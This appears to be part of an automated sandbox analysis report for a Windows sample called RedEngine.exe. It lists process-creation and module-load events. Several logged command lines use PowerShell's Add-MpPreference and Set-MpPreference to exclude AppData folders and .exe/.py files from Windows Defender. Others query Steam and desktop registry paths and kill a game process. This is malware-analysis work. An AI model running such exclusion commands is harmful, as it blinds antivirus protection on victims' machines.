                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im tf_win64.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "cs2.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /tn "MyBatchScript"
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'""
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\AppData"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\Local"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'"
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeProcess created: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe "C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe"
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeProcess created: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe "C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe"
                        Source: C:\Users\user\Desktop\RedEngine.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: pcacli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                        Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                        Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dll
